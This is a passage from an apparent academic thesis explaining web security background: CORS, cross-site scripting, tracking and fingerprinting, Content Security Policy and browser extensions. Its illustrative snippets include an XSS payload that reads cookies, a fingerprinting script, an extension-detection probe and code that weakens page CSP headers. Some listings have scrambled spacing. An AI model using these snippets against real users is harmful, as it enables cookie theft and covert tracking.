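}).listen(8000);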
3.3 CORS and sandboxing
It is worth mentioning the case of CORS requests made from sandboxed contexts (See
Section 2.2). In such contexts with unique origins, the value of the Origin header is set to
null by the browser in cross-origin requests. This makes it impossible for a web server (by
considering only the value of this Origin header) to know the real origin of the sandboxed
page from which a cross-origin request is being made. Hence, special care must be taken by
the server when considering cross-origin requests from unique origins. As the request may
be coming from any sandboxed context, the server should not rely on the Origin header to
grant access to user data. For instance, it should not accept CORS requests with credentials
from unique origins without further information, such as an additional token.
10. * matches any origin for requests without credentials, but not for requests with credentials.
4 Security and privacy threats of third party content in web
applications
Thanks to powerful scripting capabilities rendered possible by JavaScript, webpages can be
made highly interactive and dynamic. Today’s web applications rival
traditional desktop applications in terms of features and performance, thanks to constant
improvements in browsers and web technologies. Web applications collect, store and man-
age data provided by users. For instance, many web applications offer users the possibility
to provide their profile information (name, birth date, addresses, photos, credit card num-
bers...), which are stored by web servers, and used to later give access to different services
provided by the application. Web applications are also collaborative. For instance, a news
website can offer users the possibility to comment on articles and share their views with
other users.
The time when webpages were made of content originating solely from
the page’s own origin is long gone. Today, webpages embed various content from third parties. Such
pages are usually referred to as mashups, as they are built using content from different
third parties.
Attacks are widespread in the web [135], and web applications may contain vulnerabilities
that malicious users (attackers) can exploit to inject and execute malicious content (scripts)
in web applications. Third party content providers may also be malicious, or they can get
compromised by attackers, resulting in the injection and execution of malicious third party
content in web applications.
In this section, we describe security and privacy threats, both related to the presence of
third party content in web applications.
4.1 Cross-Site Scripting (XSS)
An XSS attack is a content (script) injection attack [41] in web applications that usually
involves a vulnerable website, the attacker or malicious user, and the victim user. Intu-
itively, the attack consists in injecting some malicious code in a vulnerable web page of a
website, so that it is executed in the browser of the victim user. Once injected, the ma-
licious code is indistinguishable from legitimate (benign) code executing in the context of
the page, as we have mentioned in Section 2.2. The malicious code gains the same power
as any code in the context of the page, allowing the attacker to steal user information
such as cookies, mount phishing attacks [112] (by making HTML forms that contain user
credentials point to a server under the control of the attacker), record sensitive information
provided by the user, etc. XSS is regularly ranked among the top 10 vulnerabilities in web
applications [135].
Types of XSS attacks
Three types of XSS attacks are usually distinguished, depending on the way they are con-
ducted [3]: persistent (or stored), reflected and DOM-based XSS. DOM-based XSS is a
variant of both persistent and reflected XSS. In persistent and reflected XSS, the vulnerabil-
ity is in the server’s response, which fails to correctly sanitize the inputs it receives from
the attacker and outputs them as part of the response. In DOM-based XSS however, the
vulnerability lies in the client-side code (JavaScript), which manipulates the attacker-controlled
data without proper sanitization, leading to the execution of the attacker’s content as
code [3].
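To make the distinction concrete, the following sketch shows a typical DOM-based XSS pattern:
a hypothetical page echoes a URL parameter into the DOM without sanitization, so a crafted
URL leads to the execution of attacker-controlled code.
// Vulnerable client-side code: attacker-controlled data flows into a dangerous sink.
var name = new URL(location.href).searchParams.get("name");
document.getElementById("greeting").innerHTML = "Hello " + name;
// A crafted URL such as
//   http://vulnerable.com/page.htm?name=<img src=x onerror=alert(document.cookie)>
// leads to the execution of the attacker's code in the page.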
4.2 Third party web tracking
Third party web tracking is the ability of a third party to recognize a user as she browses
the web and record her browsing history [225]. The more websites embed content
from a given third party, the more precise the browsing profile that the third party can build
about users visiting these websites. The main implication of such practices is a violation of
user privacy. In fact, the browsing profile can reveal sensitive information about a user: her
habits, political opinions, religious beliefs, sexual orientation, etc. Studies have shown that
third party tracking is often done with the purpose of web analytics, targeted advertisement
or other forms of personalization, and even user surveillance [189].
Different techniques of third party tracking (or more precisely user recognition techniques)
have been demonstrated in the wild [188,217,225,242]. Mayer and Mitchell [225] grouped
them into two categories: stateful (cookie-based and super-cookies) and stateless
(fingerprinting) mechanisms. We illustrate a cookie-based tracking mechanism, and browser
fingerprinting below.
Cookie-based tracking
If a third party has its content included in many different webpages, then, each time a user
visits one of these pages, the request made to load the content tells the third party about
the webpage in which the content is embedded. Usually, browsers add the Referer header
to requests, setting its value to the URL of the page in which the content is embedded.
Therefore, to enable (cookie-based stateful) tracking, the third party can set a cookie in
the user’s browser, the first time a request is made to load content. Then, as browsers will
attach the cookie to subsequent requests to the same third party, (See Section 1.2), the
latter can combine the URL of the page and the cookie, to recognize the user and build
her browsing profile (all the pages the user has ever visited).
Browser fingerprinting
Browser or device fingerprinting is another tracking mechanism that was first demonstrated
by Eckersley [185], where the user identifier is her browser and its properties. In this sce-
nario, when the user first visits a website that embeds some content from a tracker, the
tracker does not store any stateful information (i.e., a cookie) in the user’s browser. It rather
collects different properties of the user’s browser, including for instance the user agent, i.e.
Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
(which contains information such as the name, type, version, ... of the browser and the
OS on which it runs), the list of plugins, fonts, browser extensions installed in the user’s
browser, or the set of websites she is logged into. It then combines all these information to
build a unique fingerprint of the user browser. This fingerprint is stored on the tracker’s
server. Later on, when the user visits another website that also embeds some content from
the tracker, the tracker can recognize the user by once again collecting the properties of the
user browser, and comparing the current fingerprint with the set of user fingerprints it has
already collected. In case of a match, the tracker successfully recognizes the user behind
the browser. The effectiveness of stateful tracking is rather intuitive, since it is based on
unique identifiers set in users’ browsers. Many users,
however, can have browsers with similar properties, and thus similar fingerprints as well.
Nonetheless, the efficacy of stateless mechanisms has been extensively demonstrated. Since
the pioneering work of Eckersley [185], new fingerprinting methods have been revealed in the
literature [163-165,173,180,188,230,259,263], capable of uniquely identifying users with high
accuracy. In our study on browser extensions and Web logins fingerprinting (See Chap-
ter 7), we found that around 90% of Chrome browser users who have installed at least one
extension and are logged into at least one website, are uniquely identifiable.
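The following sketch gives a rough idea of how a fingerprinting script may combine a few browser
properties into a single identifier; real fingerprinting scripts collect many more attributes, and the
hashing step shown here is only illustrative.
// A minimal sketch of stateless fingerprinting from a few navigator properties.
var attributes = [
  navigator.userAgent,
  navigator.language,
  navigator.platform,
  screen.width + "x" + screen.height,
  new Date().getTimezoneOffset()
].join("|");

// Hash the concatenated attributes (SHA-256); the digest would be sent to the tracker.
crypto.subtle.digest("SHA-256", new TextEncoder().encode(attributes))
  .then(function (digest) {
    var fingerprint = Array.from(new Uint8Array(digest))
      .map(function (b) { return b.toString(16).padStart(2, "0"); }).join("");
    console.log(fingerprint);
  });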
5 Content Security Policy
The Content Security Policy (CSP) [258] is a W3C (World Wide Web Consortium) mech-
anism that allows programmers to control which resources can be loaded in a webpage.
In fact, the SOP allows the embedding of content from different origins, including from
third parties (See Section 2.2). CSP can be understood as a refinement of the Same Ori-
gin Policy, for further restricting the origins from which content can be loaded within a
webpage. Using CSP, a developer can explicitly whitelist the origins of content that are
trusted and can thus be loaded in webpages. Hence, once a webpage is rendered, browsers
would block any content not whitelisted in the CSP of the page. Such content may have
been injected by an attacker who exploited a vulnerability in the application. CSP is useful
as a defense-in-depth mechanism for mitigating the impact of content injection attacks in
general and Cross-Site Scripting (XSS) in particular [41]. As a first line of defense, devel-
opers are invited to properly sanitize content that they receive from users before including
it in web pages, either on the server side or on the client side. Only then should
one deploy a CSP to further guard against the impact of these attacks.
Following the success of CSP version 1 (CSP1 [261]), the W3C has standardized the second
version of CSP (CSP2 [275]) and the next version (CSP3 [272]) is already in an advanced
development state. Many browsers implement CSP, and more and more websites deploy it
to protect their pages against attacks [162,177,255,267,269].
5.1 Directives
In order to whitelist content of different types, developers express CSP policies using direc-
tives to choose a type of content, and directive values to choose trusted origins [261,272,
275]. Table 2.3 shows the meaning of CSP directives. The list of CSP directives presented
here is not exhaustive, but comprises the majority of them. We have chosen to focus mostly
on directives used for restricting content inclusion in webpages.
Each directive targets a specific type of content, and can thus be used to restrict the origins
from which content of that particular type can be loaded. Directive script-src is the most
used feature of CSP in today’s web applications [267]. It specifies the trusted origins from which
scripts can be loaded. The default-src directive is used as a fallback for *-src
directives (directives whose names end with -src). When default-src is present in a
policy and one of the directives which fall back to it is not specified, the missing
directive implicitly inherits the restrictions (values) of default-src. This directive helps,
for instance, to apply the same restrictions to many directives at a time, without explicitly
specifying them. The sandbox directive is used to sandbox the webpage to which it applies,
as if the page were a sandboxed iframe (See Section 2.2).
Directive Description
script-src scripts execution with <script> tag, XSLT stylesheets,
JavaScript events listeners (onload, onclick) on HTML el-
ements
object-src embedded plugins (Flash, PDF, etc) with object, embed,
applet tags
plugin-types allowed types of plugins (application/pdf,
application/x-shockwave-flash) specified by the type
attribute of object, embed, applet tags
style-src stylesheets (CSS) embedded with link, style tags
font-src fonts loaded via @font-face property of stylesheets and
FontFace JavaScript API
img-src images inclusion with img tag, poster of video tag
connect-src applies to AJAX requests (XMLHttpRequest, Fetch), Web-
Socket, EventSource
media-src applies to audio, video tags
frame-src, child-src applies to frames loaded with iframe, frame tags
frame-ancestors origins of top-level contexts which can nest the page as an
iframe
form-action applies to the values of the action attribute of HTML form
elements
sandbox sandboxes a page and its resources. This is similar to the use
of the sandbox attribute on an iframe (See Section 2.2)
report-uri, report-to endpoints to which CSP violation reports (content
in the page not matching the policy) are submitted
default-src used as a fallback for any type of content whose
directive is not explicitly added to the policy. It applies to
*-src directives
Table 2.3 – Excerpt of CSP directives and their descriptions
5.2 Directive values
Directive values or source lists are basically the trusted origins from which content can be
loaded. The CSP specification [261,272,275] defines, for each directive, the possible
values that it can have. We give here an overview of possible values commonly used in
directives.
Host expressions
Host expressions are used to whitelist content based on their origins. Hosts can either be
full origins (i.e. https://example.com:8080), origins with paths (https://example.com:
8080/path/), used to whitelist a set of content, or even a specific content (i.e. https:
//example.com/script.js). The scheme part of the origin can be omitted (in which case
it will be assigned the scheme of the page in which the policy is enforced). The domain
name of the origin can contain wildcards (i.e. *.example.com) to include the sub domains
of a higher-level domain. Finally, the port can also be omitted (in which case it corresponds
to the default port of the origin scheme specified, or otherwise the port of the webpage).
The host and port can take the special value *, in which case they match URLs with any
host and port number. The * can appear as a standalone value in a directive. In this case,
it allows content from any origin (excluding some local-scheme content, depending
on the CSP version). Finally, ’none’ is a special directive value to express that no content is
allowed to load.
The semantics of the host expressions values has evolved between CSP3 and previous
versions [272] w.r.t insecure schemes and ports. In CSP1 and CSP2, insecure (HTTP)
origins allow content only from the exact origin. In CSP3, this origin also allows content
from its secure (HTTPS) counterpart. For instance, whitelisting http://example.com
implicitly also whitelists https://example.com in CSP3.
Schemes
They are used to whitelist content with a specific scheme. For instance, the value https:
in a policy matches any URL whose scheme is https (i.e https://example.com/content).
Common schemes include https:, http:, data:, blob:, wss:, ws:, filesystem: and
mediastream: (the colon is required when specifying schemes in CSPs).
Keywords
CSP defines many keywords with different semantics. The ’self’ keyword is used to
whitelist content from a page’s own origin. One can also directly include the full origin of
the page in the policy to whitelist it.
Inline scripts and DOM event handlers represent the main vector for content injection
attacks. By default, CSP bans the inclusion of inline scripts and DOM event handlers in
webpages. However, the ’unsafe-inline’ keyword can be used to allow the inclusion of
inline scripts and stylesheets. Enabling inline scripts in particular makes a CSP ineffective
against attacks [177,214,267].
JavaScript has many functions that can be used for turning strings into code. This in-
cludes eval, setInterval, setTimeout and Function (See Section 1.5). Such functions
are banned by default by policies. The specification however defines the ’unsafe-eval’
keyword (to be used with the script-src and style-src directives), in order to re-enable
the use of these functions.
One of the reasons that hindered a wider adoption of CSP was the lack of a mechanism
for easily accommodating dynamically injected scripts. Weichselbaum et al. [267] then
proposed ’strict-dynamic’, a keyword that allows scripts whitelisted with
nonces or hashes to further dynamically inject additional scripts, even if those are not
explicitly whitelisted in the policy. In earlier CSP versions, a dynamically injected script was
allowed to load only if it matched the policy of the page. In CSP3, if the dynamic
script is injected by a script which has already loaded (because it matches the policy), then
the dynamic script is allowed to load, even though it does not match the policy. When the
’strict-dynamic’ keyword is used in a policy, we refer to the overall policy as a strict
CSP.
Directives which do not rely on hosts and schemes have dedicated keywords. For in-
stance, the values of the sandbox directive are those defined by the HTML specifica-
tion for the sandbox attribute of iframes and includes among others, allow-scripts,
allow-same-origin and allow-forms [76] (See Section 2.2). The values set to the directive
plugin-types are MIME types [96] of content and include for instance application/pdf
(for PDF documents), application/x-shockwave-flash (for Adobe Flash plugins), text/html
(for HTML documents), text/css (for CSS files), image/png, image/jpeg, image/gif
(for images of type PNG, JPEG, and GIF respectively), etc.
Nonces and hashes
Nonces and hashes have been introduced starting from CSP2 mainly to allow the whitelist-
ing of individual inline scripts and stylesheets. So far, there is no way to whitelist individual
DOM event handlers using nonces or hashes 11. The use of nonces improves the effec-
tiveness of CSPs regarding inline scripts [272,275] by allowing browsers to distinguish
between trusted scripts and attacker code. Comparatively, the use of ’unsafe-inline’ in
a policy automatically makes CSP ineffective against attacks [177,214,267].
A nonce is a token, randomly generated using strong cryptographic routines in order to
prevent an attacker from guessing the nonce in advance [275]. To whitelist a script with
a nonce, the nonce is added to the script-src directive, and also as a value of the nonce
attribute of the corresponding <script> tag in the page. A single nonce can be assigned
to multiple scripts.
To whitelist a script or stylesheet with a hash, one computes the hash of the script or
stylesheet content using a Secure Hash Algorithm (SHA) [126]. Then, the hash is encoded
in base64 and added to the script-src or style-src directive. Hence, when the browser
encounters a script or stylesheet in the page, it will compute its hash, and compare it with
the whitelisted ones in the policy. If there is a match, the script or stylesheet is allowed to
execute, otherwise it is blocked.
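For instance, the hash to be placed in a policy can be computed with standard cryptographic
libraries. The following Node.js sketch computes the sha256 value for an example inline script;
the inline code shown is only illustrative.
// Computing a CSP hash source for an inline script (Node.js sketch).
const crypto = require("crypto");

const inlineScript = "alert('Hello, world.');"; // exact content between <script> and </script>
const hash = crypto.createHash("sha256").update(inlineScript, "utf8").digest("base64");

// The resulting policy would contain, e.g.:  script-src 'sha256-<hash>'
console.log("'sha256-" + hash + "'");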
Precedence of directives values
It is worth mentioning the case of policies that combine ’strict-dynamic’, with non-
ces/hashes and the ’unsafe-inline’ keyword. Consider the policy shown in Listing 2.10.
script-src 'strict-dynamic' 'nonce-random123' trusted.com https: 'unsafe-inline'
Listing 2.10 – CSP differently enforced depending on the version
— In CSP3, only ’strict-dynamic’, the nonces and the hashes are considered. We refer to
policies with nonces and ’strict-dynamic’ as strict CSPs. In a strict CSP, the hosts,
schemes, ’self’ and ’unsafe-inline’ keywords are ignored. So a script is allowed
to load if it has a valid nonce or hash, or if it is dynamically injected by a script
which has already loaded (thanks to ’strict-dynamic’).
— In CSP2, ’strict-dynamic’ is ignored. If nonces or hashes are declared, ’unsafe-inline’
is also ignored. Other values are enforced, including nonces, hashes, hosts, schemes,
and other keywords.
— Finally, in CSP1, nonces, hashes and ’strict-dynamic’ are discarded. Hosts,
schemes, and other keywords such as ’unsafe-inline’ are enforced.
5.3 CSP modes and headers
A CSP to be enforced on a webpage is deployed either as an HTTP response header, or
in the HTML response body of the webpage using a <meta> tag. The name of the CSP
header depends on the mode of deployment. There are two modes. In the report-only mode,
the browser does not prevent content that does not match the policy from loading. Such
content is simply reported to the developer at the reporting endpoint specified in the
policy with the report-uri or report-to directives (See Table 2.3). To deploy a CSP in
report-only mode, one uses the Content-Security-Policy-Report-Only header.
11. There is a draft proposal in the current CSP3 [272] to allow hashes to be used for whitelisting individual
DOM event handlers. This mechanism is however not yet implemented by browsers.
In the dual enforcement mode, content that does not match the policy is effectively blocked
before being reported. The Content-Security-Policy header is used to deploy a policy in
enforcement mode 12.
The <meta> tag has some restrictions. Report-only policies are not enforced when delivered
in the <meta> tag. Moreover, even in enforcement mode, the sandbox and
frame-ancestors directives are ignored by the browser when a policy is delivered in the
<meta> tag.
CSP allows many policies to be deployed and enforced on the same page. One can either deploy
multiple policies in a single header by separating them with a comma, or send multiple
headers (report-only or enforcement mode), each with a single policy or a set of policies. In any
case, the multiple policies are all individually enforced: content is allowed to load only if it is
allowed by all of the policies.
5.4 Example of CSPs
We present here different examples of policies.
Origin-based policies
Listing 2.11 presents a CSP where scripts are whitelisted based on their origins. We call
them origin-based policies.
script-src trusted.com redirect.com partials.com/scripts/;
img-src https:
Listing 2.11 – Example of an origin-based CSP
Only scripts from the explicitly specified origins are allowed to load in the webpage on
which this policy will be deployed. Assume that this policy is deployed on a page with the
URL https://example.com, then the injection of a script with URL https://trusted.
com/script.js in the webpage is allowed since the script comes from the whitelisted origin
trusted.com. Images can be loaded from any secure domain. No restrictions are set on
other types of content.
Nonce-based policies
Listing 2.12 shows a nonce-based policy.
script-src 'nonce-random12345' 'strict-dynamic';
Listing 2.12 – Example of CSP with nonces
Nonces are used to whitelist individual scripts. To allow a script to load, one injects
<script src="https://trusted.com/script.js" nonce="random12345"></script> in
the page (Note the use of the nonce attribute which value is a nonce whitelisted in the
policy of the page).
With the presence of the ’strict-dynamic’ keyword, scripts that load can further dy-
namically inject additional non-parser-inserted scripts. Listing 2.13 shows an example of a
parser inserted script, that will fail to load in presence of ’strict-dynamic’.
document.write('<script src="https://example.com/script.js"></script>');
Listing 2.13 – Parser-inserted script
12. In CSP1, the CSP headers were prefixed with X-. The X-Webkit-CSP was also used for delivering
policies
To load dynamic scripts, one can inject them as shown in the following Listing 2.14.
var script = document.createElement("script");
script.src = "https://example.com/script.js";
document.body.appendChild(script);
Listing 2.14 – Non-parser-inserted scripts
Contrary to the CSP in Listing 2.11 where one knows the exact origins from which content
can load, in the case of strict CSP, scripts that effectively load are known only at runtime.
Delivering policies
Listing 2.15 shows the deployment of a CSP in enforcement mode in an HTTP header.
Content-Security-Policy: default-src https://cdn.example.net;
child-src 'none'; object-src 'none'
Listing 2.15 – Delivering CSP in HTTP header
Listing 2.16 shows the same policy delivered in an HTML meta tag.
<meta http-equiv="Content-Security-Policy" content="default-src
https://cdn.example.net; child-src 'none'; object-src 'none'">
Listing 2.16 – Delivering CSP in HTML meta tag
6 Browser extensions
Browser extensions or addons are third party programs that users can download and
add to their browsers to extend the functionality of browsers and improve their brows-
ing experience. Irrespective of the browser, the concept of addons or extensions always
conveys similar characteristics: browser extensions have access to elevated browser APIs
that are not accessible to traditional web applications. In the past, many vendors were
providing specific technologies for building extensions that would only run on their own
browsers [25,110,134,156]. The WebExtensions API [100] is a cross-browser system, for
developing extensions using standard HTML, JavaScript and CSS languages, that can run
on many browsers including Google Chrome, Opera, Mozilla Firefox and Microsoft Edge.
Interestingly, their specific extensions APIs [2,25,100,110] are compatible with each other
to some extent, making it easy to migrate extensions written for a specific browser to other
browsers with just a few changes. In the rest of this thesis, unless otherwise specified, when
we talk about extensions or addons, we mean cross-browser WebExtensions.
Extensions execute in browsers with elevated privileges. For instance, they can inject scripts
(content scripts) to manipulate the DOM of web pages running in the user browser. They
are not subject to the Same Origin Policy [125] with respect to their ability to make cross-
origin requests. Hence, they can make requests with user credentials to get data from any
web application server (See Section 3 on cross-origin requests). They have access to user
information stored in the browser such as cookies, browsing history, bookmarks, etc.
They have access to a permanent storage in which data can be persistently stored as long
as the extension is installed in the user browser. Examples of popular browser extensions
are adblockers, such as AdBlock [6] and password managers, such as LastPass [86].
6.1 Security considerations
Because of the privileged browser features they have access to, extensions represent valuable
targets for attackers. To limit the harm that attackers could cause if they compromise an
extension, extensions must declare, in a mandatory manifest.json file, permissions for
the APIs that they effectively use in the extension code. Listing 2.17 shows an example
of a manifest file and the permissions (features and APIs) the extension will be granted
access to at runtime.
{
  "permissions": [
    "<all_urls>",
    "storage",
    "management",
    "cookies",
    "history",
    "bookmarks",
    "downloads",
    "webRequest",
    "webRequestBlocking"
  ]
}
Listing 2.17 – Permissions declaration in a manifest file
These are only a subset of all the capabilities provided by browsers to extensions. When
installed, this extension will be granted full access (read/write) to data on any web ap-
plication, thanks to the permission <all_urls>, called the host permission. This implies
that if the user is logged into a web application (mailing, banking, social networks, ...),
the extension also has access to the user’s private data on that application. The rest of
the permissions are rather self-explanatory. The storage permission allows the extension to
store and retrieve data in the browser. The permissions management, cookies, history,
and bookmarks give the extension the right to access and manage the list of installed
extensions, cookies, the user’s browsing history and bookmarks respectively. With the
downloads permission, the extension can download and save arbitrary files in the user’s
device. The webRequest and webRequestBlocking permissions give an extension the abil-
ity to intercept and tamper with HTTP communications between web applications and web
servers. In particular, it can add or remove HTTP headers in requests and responses [28,59].
6.2 Architecture
Extensions are made up of 3 main parts or components.
...
" b ac k gr o un d " : {
"scripts": [ " b a ck g ro u nd . js " ]
},
"content_scripts": [{
"matches": [ " < a ll _ ur l s >"],
"scripts": [ " c o nt e nt _ sc r ip t s. j s "]
}] ,
"browser_action": {
"default_icon":" i co n .p n g " ,
" d ef a ul t _p op u p ":" p o pu p .h t m "
}
...
Listing 2.18 – Declaring different components of an extension in the manifest file
Listing 2.18 shows the declaration of different components of an extension: the scripts that
will execute in the extension background page, the content scripts that will be injected in
all web pages, and a UI page (browser action) with an icon, which once clicked, will display
a popup for the user to customize the extension for example.
There is a separation of privileges among the different components of an extension. More
importantly, webpages and extensions execute in separate contexts. In the contexts of
extension components, extension-specific APIs are all accessible via the chrome object in
Chrome and Opera browsers [25,110], and via the browser object in Firefox and Microsoft
Edge [2,100]. The chrome or browser object is a property of the global object window (See
Section 1.5). The document object allows background scripts to manipulate the background
page DOM, UI page scripts to manipulate the UI page DOM, and content scripts
to manipulate the webpage DOM.
— The background page runs the main logic of the extension. It is composed of a set
of scripts that execute in the background, without any visual UI. Scripts running
in the background page have access to all the permissions of the extension. The
background page is in fact an HTML page, which can be directly declared in the
manifest.json file [14]. When only its scripts are declared (as in our example), the
browser generates an HTML page in which the scripts are executed.
— UI pages are meant for the user to interact with the extension, for instance
to enable or disable it, or to customize its behavior with specific settings. Background
and UI pages have direct access to each other’s DOM and execution contexts.
— Content scripts are injected by the browser to run alongside webpages. Content scripts
run in a separate context, different from the context of background pages, and dif-
ferent also from the context of web pages in which they are injected. Even though
they are not granted access to all the extension capabilities, they can directly use
the host and storage permissions to access user data on any web application or to
store and retrieve data from the extension storage. Content scripts can manipulate
the webpage DOM, and the changes they make to the DOM are visible to scripts
executing in the context of webpages. Changes made to the DOM by the webpage
are also visible to content scripts. Content scripts share the same HTML5 localStorage as web-
pages (note that this is different from the extension storage, which they share
with the rest of the extension’s components).
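For example, a content script could combine these capabilities as in the following sketch: it
persists data in the extension storage and directly modifies the DOM of the webpage (the
counting logic is only illustrative).
// Content script sketch: counting visited pages in the extension storage.
chrome.storage.local.get({ visits: 0 }, function (items) {
  chrome.storage.local.set({ visits: items.visits + 1 });
});

// The content script can also read and modify the webpage DOM directly.
document.title = "[extension] " + document.title;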
6.3 Extensions injected content
Listing 2.19 shows the injection of a script in a webpage, done by the content script.
var script = document.createElement("script");
script.src = "https://example.com/script.js";
document.body.appendChild(script);
Listing 2.19 – Content injection in webpages DOM
Content injected in the DOM of webpages is visible to the page. In the particular case
of scripts, they are executed in the context of the page and not in that of the content scripts.
Content injected by content scripts is not restricted by the CSP of the page. That
is, the script injected as shown in Listing 2.19 will execute in any page, even if
the CSP of the page does not allow content from https://example.com. This is the case
for any other remote content injected in the webpage by the extension. Consider however
an example in which a content script injects a script A in the page. A will load because the
CSP of the page is not applied to it. Any content that A in turn attempts to inject will be
subject to the CSP of the page [26,200].
6.4 Extensions identification
Each extension in browsers supporting the WebExtensions API [100], is assigned a unique
identifier that helps to distinguish it from other extensions the user has installed. In Chrome
and Opera (and related browsers), the unique identifier is the same and is permanent for
the extension regardless of the browser in which it is installed. For instance, the uBlock
Origin [140] extension is assigned the identifier cjpalhdlnbpafiamejdnhcphjbkeiagm in
any Chrome browser in which it is installed. On any Opera browser, its unique identifier
is kccohkcpppjjkkjppopfnflnebibpida [142]. On the contrary, Firefox has adopted a
completely different approach: an extension is assigned a random unique identifier, called
a UUID, when it is installed in a Firefox browser 13. As a consequence, the uBlock Origin
extension in Firefox will be assigned a different browser-specific identifier for each browser
in which it is installed. This identifier remains unique as long as the extension is installed
in the browser. In our browser, a813af59-53ff-4845-bc98-1b820a790ff5 is the identifier
of uBlock Origin [141].
6.5 Web Accessible Resources
Web accessible resources (WARs) are content in the extension bundle (package) that the
extension intends to inject in the DOM of web pages [57,63]. As we have mentioned
previously, content scripts have access to the page DOM, which they can modify by injecting
content. Such content can be located on remote servers, or in the extension package
on the user’s browser. Browsers require that the extension explicitly declare the content of
its package that can be injected in web pages. In the manifest.json file, this content
is declared using the web_accessible_resources key, as shown in Listing 2.20.
{
"web_accessible_resources": [ " i m a ge s /* . p n g " ," s cr i p ts / * "]
}
Listing 2.20 – Declaring web accessible resources (WARs) in the manifest file
Web accessible resources injected in web pages have URLs of the following form.
[Ext-Scheme]://[Ext-ID]/[path]
Listing 2.21 – Scheme of extensions web accessible resources URLs
The Ext-Scheme is the scheme used for extension bundle resources. Chrome and Opera
use the chrome-extension scheme (protocol), while Firefox uses moz-extension. The Ext-ID
is the unique identifier of the extension. Finally, path is the path to the web accessible
resource itself in the extension bundle.
Browsers provide a convenient way for content scripts to inject packaged resources in web pages by
specifying only the path to the resource. By invoking chrome.runtime.getURL("icon.png"),
the content script obtains the URL of the resource icon.png: the browser prepends the
scheme and the extension identifier, as shown in Listing 2.21.
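As a hedged illustration, the content script sketch below injects a packaged image declared as a web accessible resource; the path images/icon.png is only an example matching the declaration of Listing 2.20.

// Hypothetical content script injecting a packaged image declared as a WAR.
var img = document.createElement("img");
// resolves to e.g. chrome-extension://<Ext-ID>/images/icon.png on Chrome
img.src = chrome.runtime.getURL("images/icon.png");
document.body.appendChild(img);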
13. In reality, Firefox extensions also have another identifier, which is permanent as in the case of Chrome.
It is used, among other things, to update extensions [52], and not for the identification of extensions (and
their resources) that we discuss here.
If web accessible resources can be injected by content scripts in web pages, nothing prevents
a script in a webpage from also loading a WAR. On Chrome and Opera, extension
identifiers are publicly known. All browsers have a centralized place where extensions can
be downloaded and installed in the user’s browser [24,58,94,108].
By downloading an extension, one has access to its source code and can determine whether
the extension has web accessible resources or not. There are extensions, such as the CRX
Extension Viewer [277], which let one display and navigate the source code of other extensions
directly in a browser. Knowing the unique identifier and web accessible resources of an
extension allows a webpage to also load those web accessible resources and detect the presence of
extensions that a user has installed in her browser [198,245,249].
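A minimal sketch of such a detection probe is given below. The identifier is the public Chrome identifier of uBlock Origin cited above, but the resource path is purely hypothetical: a real probe would use a path taken from the extension's actual manifest.

// Hypothetical detection script running in an ordinary webpage: it tries to
// load a (supposed) web accessible resource of an extension; onload fires
// only if the extension is installed and exposes that resource.
var probe = new Image();
probe.onload = function () { console.log("extension appears to be installed"); };
probe.onerror = function () { console.log("extension not detected"); };
probe.src = "chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/images/icon.png";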
Part I
Content Security Policy
Introduction
Content Security Policy was first proposed by Stamm et al. [258] and standardized by
the W3C, as a refinement of SOP [125], in order to help mitigate Cross-Site-Scripting [278]
and data exfiltration attacks.
Since its introduction [275], CSP has gained significant attention from the research
community, with proposals aimed at improving its effectiveness and security [177,267].
The second version [275] of the specification is supported by all major browsers, and the
third version [272] is in an advanced development state. CSP adoption on websites in the
wild is growing, albeit slowly [177,255,267,269]. To help improve CSP adoption,
many tools have been proposed [214,235,236].
CSP adoption measurements Even though CSP is well supported by browsers [177], its
endorsement by web sites is rather slow. Weissbacher et al. [269] performed the first large-scale
study of CSP deployment on top Alexa sites, and found that around 1% of sites were
using CSP at the time. Calzavara et al. [177] found that nearly 8% of Alexa top sites had
CSP deployed on their front pages in 2016. Another study, by Weichselbaum et al. [267],
came to results similar to those of Weissbacher et al. [269].
Tools to ease CSP adoption Almost all authors agree that CSP adoption is not a
straightforward task, and that a lot of (manual) effort is needed to reorganize and
modify web pages to support CSP. Therefore, in order to help web site developers
adopt CSP, Javed proposed CSP Aider [209], which automatically crawls a set of pages
from a site and proposes a site-wide CSP. Patil and Frederik [236] proposed UserCSP,
a framework that monitors internal browser events in order to automatically infer a
CSP for a web page based on the loaded resources. Pan et al. [235] proposed CSPAutoGen,
which enforces CSP in real time on web pages by rewriting them on the fly, client-side.
Weissbacher et al. [269] evaluated the feasibility of using CSP in report-only mode
in order to generate a CSP based on reported violations, or of semi-automatically inferring
a CSP based on the resources that are loaded in web pages. They concluded that
automatically generating a CSP is ineffective. Another difficulty is the use of inline scripts
in many pages. A first solution is to externalize inline scripts, as done by systems
like deDacota [184]. Kerschbaumer et al. [214] find that too many pages still use
’unsafe-inline’ in their CSPs. They propose a system to automatically identify legitimate
inline scripts in a page and whitelist them in the page’s CSP using script hashes.
Evaluating CSP effectiveness Another direction of research on CSP has been evaluating
its effectiveness at preventing content injection attacks. Calzavara et al. [177]
found that many CSP policies on real web sites had errors, including typos and ill-formed
or harsh policies. Even when the policies were well formed, they found that almost all
deployed CSP policies were bypassable because of a misunderstanding of the CSP language
itself. Johns [212] first demonstrated that insecure JSONP endpoints can lead to bypasses,
and proposed a server-side templating mechanism for safely assembling code and data to
prevent such attacks. Weichselbaum et al. [267] also showed many other subtle bypasses
which make CSP ineffective at preventing attacks. Patil and Frederik found similar errors
in their study [236]. Van Acker et al. [168] have shown that CSP fails at preventing data
exfiltration, especially when resources are prefetched or in the presence of a CSP policy in the
HTML meta tag, because the order in which resources are loaded in a web application is
hard to predict. Hausknecht et al. [200] found that some browser extensions modify the
CSP headers of pages in order to whitelist more resources and origins (a sketch of such a
header rewrite is given below). This can potentially undermine the effectiveness of CSP at
mitigating attacks.
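As a purely illustrative sketch, and not the code studied in [200], the following shows how an extension granted the webRequest and webRequestBlocking permissions could relax the CSP header of the responses it intercepts; the extra origin is a placeholder.

// Hypothetical extension background script that appends one more origin to the
// Content-Security-Policy header of every response it intercepts.
chrome.webRequest.onHeadersReceived.addListener(function (details) {
  var headers = details.responseHeaders.map(function (header) {
    if (header.name.toLowerCase() === "content-security-policy") {
      header.value += " https://extension-cdn.example"; // whitelist one more origin
    }
    return header;
  });
  return { responseHeaders: headers };
}, { urls: ["<all_urls>"] }, ["blocking", "responseHeaders"]);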
Improving CSP Expressiveness Johns [211] proposed hashes for static scripts, and
PreparedJS, an extension for CSP, in order to securely handle server-side dynamically
generated scripts based on user input. Weichselbaum et al. [267] have extended nonces and
